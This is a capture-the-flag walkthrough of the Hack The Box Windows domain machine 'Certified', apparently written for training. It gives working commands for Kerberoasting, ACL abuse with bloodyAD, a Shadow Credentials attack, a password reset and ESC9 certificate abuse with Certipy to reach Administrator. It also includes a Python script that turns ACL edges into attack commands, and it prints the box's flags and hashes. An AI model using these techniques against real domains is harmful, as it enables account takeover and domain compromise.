Box Info
  • Name: Certified
  • OS: Windows
  • Difficulty: Medium
  • IP: 10.10.11.41

Setup

mkdir -p ~/ctf/HackTheBox/certified/scans; cd ~/ctf/HackTheBox/certified

IP Address: 10.10.11.41

echo "10.10.11.41 certified.htb" | sudo tee -a /etc/hosts

10.10.11.41 certified.htb


As this is an Assumed Breach scenario box, we are given the following credentials to start with:

judith.mader:judith09

Enumeration

nmap -sC -sV -Pn -p- certified.htb -oN scans/nmap -vv

nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 certified.htb

# nmap findings
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49689/tcp open  unknown          syn-ack ttl 127
49690/tcp open  unknown          syn-ack ttl 127
49691/tcp open  unknown          syn-ack ttl 127
49720/tcp open  unknown          syn-ack ttl 127
49729/tcp open  unknown          syn-ack ttl 127

Next, using NetExec (nxc) with the provided credentials, we enumerate LDAP (port 389) and SMB (port 445) to list shares and domain users.

Shares: (screenshot, not reproduced here)

Users:

Administrator
Guest
krbtgt
judith.mader
management_svc
ca_operator
alexander.huges
harry.wilson
gregory.cameron

Using LDAP enumeration, we find that the user management_svc has an SPN set and is therefore Kerberoastable, so we request a TGS for it and save the hash.

Using hashcat (mode 13100, Kerberos 5 TGS-REP etype 23) we try to crack it with .\hashcat.exe -m 13100 .\hash.txt .\rockyou.txt, but are unsuccessful: the service account password is not in rockyou.

Using nxc ldap 10.10.11.41 -d certified.htb -u judith.mader -p judith09 --dns-server 10.10.11.41 --bloodhound -c All we collect BloodHound data (a zip of JSON files) to enumerate ACLs further.

In BloodHound we find a path from judith.mader to ca_operator: judith.mader has WriteOwner on the Management group, Management has GenericWrite on management_svc, and management_svc has GenericAll on ca_operator.
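The path above is a chain of ACL abuses, each of which hands us a new identity or group membership that unlocks the next edge. The following added example (not part of the original writeup) reproduces that path as a constructed edge list, finds it by breadth-first search, and turns each edge into the bloodyAD / pywhisker steps used in the rest of this walkthrough. It generalises slightly beyond the box: WriteDacl on a group and ForceChangePassword on a user are mapped as well. The edge list, the hypothetical placeholder secrets and the command mapping are assumptions for illustration, not a BloodHound export.

```python
from collections import deque

# Constructed edge list reproducing the BloodHound path shown in the writeup
# (source principal, right, target object, target type). Other ACEs that exist in the
# real domain are deliberately left out; this is an illustration, not a BloodHound export.
EDGES = [
    ("judith.mader", "WriteOwner", "Management", "group"),
    ("Management", "GenericWrite", "management_svc", "user"),
    ("management_svc", "GenericAll", "ca_operator", "user"),
]


def shortest_path(start, goal, edges):
    """Breadth-first search over ACL edges; returns the edge list from start to goal, or None."""
    adj = {}
    for edge in edges:
        adj.setdefault(edge[0], []).append(edge)
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for edge in adj.get(node, []):
            if edge[2] not in seen:
                seen.add(edge[2])
                queue.append((edge[2], path + [edge]))
    return None


def plan(start, goal, edges, dc="10.10.11.41", domain="certified.htb"):
    """Turn the path into the bloodyAD / pywhisker steps used in the walkthrough.

    `actor` is the identity whose credential we currently hold; `controlled` is the set of
    principals whose ACEs that identity can exercise (itself plus any group it has joined).
    Secrets are left as <placeholders>: they are only known once the previous step has run.
    """
    path = shortest_path(start, goal, edges)
    if path is None:
        raise ValueError(f"no ACL path from {start} to {goal}")
    actor, controlled, steps = start, {start}, []
    for src, right, dst, kind in path:
        if src not in controlled:
            raise ValueError(f"{right} on {dst} belongs to {src}, which {actor} does not control")
        bloody = f"bloodyAD --host {dc} -d {domain} -u {actor} -p <{actor}-secret>"
        if kind == "group" and right in ("WriteOwner", "WriteDacl", "GenericAll"):
            cmds = []
            if right == "WriteOwner":
                # The owner of an object may rewrite its DACL, so taking ownership is enough
                # to then grant ourselves GenericAll and add ourselves to the group.
                cmds.append(f"{bloody} set owner {dst} {actor}")
            if right in ("WriteOwner", "WriteDacl"):
                cmds.append(f"{bloody} add genericAll {dst} {actor}")
            cmds.append(f"{bloody} add groupMember {dst} {actor}")
            controlled.add(dst)  # we now inherit the group's outbound rights
        elif kind == "user" and right == "GenericWrite":
            # Shadow Credentials: write msDS-KeyCredentialLink, get a TGT via PKINIT with the
            # certificate, then let getnthash.py read the NTLM credential from the PAC.
            cmds = [
                f"pywhisker -d {domain} -u {actor} -p <{actor}-secret> --target {dst} --action add --filename {dst}",
                f"gettgtpkinit.py -cert-pfx {dst}.pfx -pfx-pass <pfx-password> {domain}/{dst} {dst}.ccache",
                f"KRB5CCNAME={dst}.ccache getnthash.py -key <as-rep-enc-key> {domain}/{dst}",
            ]
            actor, controlled = dst, {dst}  # from here on we act as the target user
        elif kind == "user" and right in ("GenericAll", "ForceChangePassword"):
            # The walkthrough resets the password here; Shadow Credentials also work with
            # GenericAll and are the quieter choice when the account is in active use.
            cmds = [f"{bloody} set password {dst} <new-password>"]
            actor, controlled = dst, {dst}
        else:
            raise ValueError(f"no abuse mapped for {right} on {kind} {dst}")
        steps.append((src, right, dst, cmds))
    return steps


if __name__ == "__main__":
    for src, right, dst, cmds in plan("judith.mader", "ca_operator", EDGES):
        print(f"[{right}] {src} -> {dst}")
        for c in cmds:
            print("   ", c)
```

Running it prints the three edges with the commands for each; the second edge is issued as judith.mader (who is by then a member of Management), the third as management_svc with the hash recovered from the Shadow Credentials step.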

Setting the Management group's owner to Judith

Using the bloodyAD tool we abuse WriteOwner and set the group's owner to judith: bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 set owner Management judith.mader

Because the owner of an object can rewrite its DACL, we can now grant judith GenericAll on the Management group, which lets us add her to it: bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 add genericAll Management judith.mader

Now we add judith to Management, so that she inherits the group's GenericWrite right over the management_svc user.

bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 add groupMember Management judith.mader


GenericWrite on management_svc

GenericWrite on a user lets us write its msDS-KeyCredentialLink attribute, so we can use pywhisker to perform a Shadow Credentials attack: we add a certificate to the account and then authenticate as management_svc with it over PKINIT.

./pywhisker -d certified.htb -u judith.mader -p judith09 --target management_svc --action add --filename mgmt_svc


python3 PKINITtools/gettgtpkinit.py -cert-pfx venv/bin/mgmt_svc.pfx -pfx-pass xXGg4pFUaqdvN04gqYuF certified.htb/management_svc management_svc.ccache

gettgtpkinit.py requests a TGT over PKINIT with the certificate pywhisker just added and saves it to management_svc.ccache; it also prints the AS-REP encryption key, which the next step needs. Set the KRB5CCNAME environment variable to management_svc.ccache before running getnthash.py, which uses that TGT (user-to-user Kerberos) to decrypt the PAC and read the account's NTLM credential from it:

python3 PKINITtools/getnthash.py -key 1ff1c8b4ea8d572eb1f773b5481a026a23e10b2a724caeb889ee398319724525 certified.htb/management_svc


From the Shadow Credentials attack above we get the NT hash of the management_svc user:

management_svc:a091c1832bcdd4677c28b5a6a1295584

Using NetExec we verify that the hash authenticates (SMB and WinRM). management_svc is allowed to log in over WinRM (port 5985), so evil-winrm with this hash gives us a shell.


User Flag

Location: C:\Users\management_svc\Desktop | Flag: b4f932ca96fde437b29e2b73dd312357

Privilege Escalation

GenericAll rights on CA_Operator

management_svc has GenericAll over the ca_operator account, so using bloodyAD --host 10.10.11.41 -d certified.htb -u management_svc -p :a091c1832bcdd4677c28b5a6a1295584 set password ca_operator Password@1! we change the password of ca_operator (bloodyAD takes an NT hash when -p is given as :hash).

Certipy

Using certipy find -u ca_operator@certified.htb -p 'Password@1!' -dc-ip 10.10.11.41 -vulnerable -text -enabled we find that the 'CertifiedAuthentication' template is vulnerable to ESC9 (Template has no security extension): certificates issued from it carry no szOID_NTDS_CA_SECURITY_EXT (SID) extension, so the DC maps them to an account by the UPN in the certificate alone.

Since management_svc has GenericAll over ca_operator, we can rewrite ca_operator's userPrincipalName. Using certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator we set ca_operator's UPN to Administrator.

Using certipy req -username ca_operator@certified.htb -hashes dbf36575210cc5a38ab4050cc6a2e9aa -ca certified-DC01-CA -template CertifiedAuthentication we request a certificate as ca_operator. The UPN embedded in it is now Administrator, and because the template has the no-security-extension flag there is no SID in the certificate to contradict it. This only works while the DC's StrongCertificateBindingEnforcement setting is not Full Enforcement (value 2); in that mode certificates without the SID extension are rejected outright.

Using the obtained certificate we authenticate and get the NT hash using certipy auth -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'


administrator:0d5b49608bbce1751f708748f67e2d34

Now we restore ca_operator's UPN with the same certipy account update command, this time with -upn ca_operator@certified.htb, so the account is left as we found it.

We verify the access using nxc and evil-winrm:



Root Flag

Location: C:\Users\Administrator\Desktop | Flag: a5404d7db96e03dfa194c6ba6c04dffb